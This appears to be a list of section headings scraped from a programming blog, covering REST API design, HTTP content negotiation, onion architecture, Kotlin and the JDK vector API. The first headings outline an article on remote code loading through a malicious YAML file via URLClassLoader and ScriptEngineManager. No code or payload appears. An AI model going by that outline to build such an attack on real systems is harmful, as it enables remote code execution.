Where is the security issue?

Loading remote code via URLClassLoader

Using ScriptEngineManager to run code for us

But what content must be provided in the remote jar file?

Constructing a malicious YAML file

A standardized error format for HTTP responses

RFC 7807: Problem Details for HTTP APIs

Problem types

Extension members

Conclusion

HTTP - Content negotiation

Server-driven and agent-driven content negotiation

Accept headers

What if the server cannot return an acceptable response?

Content negotiation in REST APIs

Avoid leaking domain logic

Using more specific domain operations

Media types and the Content-Type header

The Content-Type header

From layers to onions and hexagons

Classic layers

What is the problem with this?

Abstraction with interfaces

In and out

The onion architecture

What to remember?

Further reading

File down- and uploads in RESTful web services

Think about the operation you want to express

Mixing files and metadata

Embedding Base64 encoded files in JSON or XML

Mixing media-types with multipart requests

Kotlin: Type conversion with adapters

Creating an extension function

Providing conversion rules with adapters

Searching for an appropriate adapter

Example usage

Making POST and PATCH requests idempotent

Using a unique business constraint

Using ETags

Using a separate idempotency key

Summary

Providing useful API error messages with Spring Boot

Client and security perspectives

How to build a useful error response in a Spring Boot application?

Testing error responses

Summary

Supporting bulk operations in REST APIs

Expressing multiple operations within the request body

Multipart Content-Type for the rescue?

Bulk operations on REST resources

Partially updating collections

Which HTTP status code is appropriate for responses to bulk requests?

Summary

Looking into the JDK 16 vector API

Why vector operations?

Enabling the vector incubator module (jdk.incubator.vector)

Implementing a simple vector operation

Working with loops

Summary

Kotlin dependency injection with Koin

Getting started with Koin